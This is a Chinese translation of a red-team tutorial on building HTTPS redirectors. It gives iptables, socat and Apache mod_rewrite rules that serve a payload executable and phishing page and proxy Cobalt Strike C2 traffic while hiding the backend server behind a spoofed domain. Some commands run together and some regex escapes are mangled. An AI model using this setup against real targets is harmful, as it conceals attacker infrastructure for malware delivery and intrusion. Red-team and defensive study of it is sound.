时间:2023-02-09 07:30:01 | 来源:建站知识
时间:2023-02-09 07:30:01 来源:建站知识
我已经写了很多关于使用重定向以及如何加强红队评估的文章。自从写了关于该主题的第一篇文章以来,我常收到的问题是如何对HTTPS流量做同样的事情。在这篇文章中,我将详细介绍不同的HTTPS重定向方法以及何时使用它们。iptables -I INPUT -p tcp -m tcp --dport 443 -j ACCEPTiptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT --to-destination <REMOTE-HOST-IP-ADDRESS>:80iptables -t nat -A POSTROUTING -j MASQUERADEiptables -I FORWARD -j ACCEPTiptables -P FORWARD ACCEPTsysctl net.ipv4.ip_forward=1
(二)socatsocat TCP4-LISTEN:443,fork TCP4:<REMOTE-HOST-IP-ADDRESS>:443
如果重定向的流量很大(如C2),socat可能会开始遇到问题或使主机速度缓慢。如果遇到这些问题,请尝试iptables。apt-get install apache2a2enmod ssl rewrite proxy proxy_httpa2ensite default-ssl.confservice apache2 restart
在Apache2配置文件(默认为/etc/apache2/apache2.conf)中,找到站点目录的Directory标记并将None更改为All:<Directory /var/www/> Options Indexes FollowSymLinks AllowOverride None Require all granted</Directory>
使用LetsEncrypt生成证书sudo service apache2 stopsudo apt-get install certbotsudo certbot certonly --standalone -d spoofdomain.com -d www.spoofdomain.com
修改certbot命令以包含任何其他需要使用-d标志保护的子域。请注意,上面我们指定了根域以及www子域。SSLCertificateFile /etc/letsencrypt/live/spoofdomain.com/cert.pemSSLCertificateKeyFile /etc/letsencrypt/live/spoofdomain.com/privkey.pem
另外,将以下代码添加到VirtualHost标记中的同一文件中:# Enable SSLSSLEngine On# Enable ProxySSLProxyEngine On# Trust Self-Signed Certificates generated by Cobalt StrikeSSLProxyVerify noneSSLProxyCheckPeerCN offSSLProxyCheckPeerName off
现在使用有效的LetsEncrypt证书进行基本的SSL安装。从这里开始,这篇文章将演示如何提供所需的payload文件或网页,以及如何重定向C2流量。RewriteEngine OnRewriteCond %{REQUEST_URI} ^/(payload/.exe|landingpage/.html)/?$ [NC]RewriteRule ^.*$ http://REMOTE-HOST-IP%{REQUEST_URI} [P]RewriteRule ^.*$ http://example.com/404? [L,R=302]
以下为彩色代码细划了正在执行的规则:Enable the rewrite engineIf the request's URI is either '/payload.exe' or '/landingpage.html' (with an optional trailing slash), ignoring case; Change the entire request to serve the original request path from the remote host's IP, and keep the user's address bar the same (obscure the backend server's IP).If the above conditions are not met, change the entire request to http://example.com/404 and drop any query strings from the original request. Do not evaluate further rules and redirect the user, changing their address bar.
注意上面的规则集,使用HTTP作为第一个RewriteRule,是因为仅使用HTTP在后端服务器上托管payload.exe和landingpage.html文件。openssl pkcs12 -export -in fullchain.pem -inkey privkey.pem -out spoofdomain.p12 -name spoofdomain.com -passout pass:mypasskeytool -importkeystore -deststorepass mypass -destkeypass mypass -destkeystore spoofdomain.store -srckeystore spoofdomain.p12 -srcstoretype PKCS12 -srcstorepass mypass -alias spoofdomain.com
添加keystore到Malleable C2:https-certificate { set keystore "spoofdomain.store"; set password "mypass"; }
当team服务器启动时,它将使用提供的keystore并启用SSL文件托管。RewriteEngine OnRewriteCond %{REQUEST_URI} ^/(payload/.exe|landingpage/.html)/?$ [NC]RewriteRule ^.*$ http://REMOTE-HOST-IP%{REQUEST_URI} [P]RewriteCond %{REQUEST_URI} ^/(legit-path-1|legit-path-2|stager)/?$ [NC]RewriteRule ^.*$ https://REMOTE-HOST-IP%{REQUEST_URI} [P]RewriteRule ^.*$ http://example.com/404? [L,R=302]
以下为彩色代码细划了正在执行的规则:Enable the rewrite engineIf the request's URI is either '/payload.exe' or '/landingpage.html' (with an optional trailing slash), ignoring case; Change the entire request to serve the original request path over HTTP from the remote host's IP, and keep the user's address bar the same (obscure the backend server's IP).If the request's URI is '/legit-path-1', '/legit-path-2', or '/stager' (with an optional trailing slash), ignoring case; Change the entire request to serve the original request path over HTTPS from the remote host's IP, and keep the user's address bar the same (obscure the backend server's IP).If the above conditions are not met, change the entire request to http://example.com/404 and drop any query strings from the original request. Do not evaluate further rules and redirect the user, changing their address bar.
这显然是一个人为的例子,需要使用Malleable C2配置文件进行设置以提供一些规避策略,但上面的代码应该说明如何在HTTP和HTTPS之间混合使用。RewriteCond %{HTTPS} !=on [NC]RewriteRule ^.*$ https://REDIRECTOR-DOMAIN.com%{REQUEST_URI} [L,R=301]
以下为彩色代码细划了正在执行的规则:Enable the rewrite engineIf the request's SSL status is NOT "on",Change the entire request to serve the original request path from REDIRECTOR-DOMAIN.com over HTTPS, and change the user's address bar show the redirection. Make the redirect permanent with a 301 code.
上面的规则集从http://AskApache.com(here)采用并略微修改。如果请求使用SSL / TLS,则%{HTTPS}变量将返回on,如果仅使用HTTP,则返回off。本文翻译自:https://posts.specterops.io/https-payload-and-c2-redirectors-ff8eb6f87742 如若转载,请注明原文地址: http://www.4hou.com/technology/11132.html 更多内容请关注“嘶吼专业版”——Pro4hou
关键词: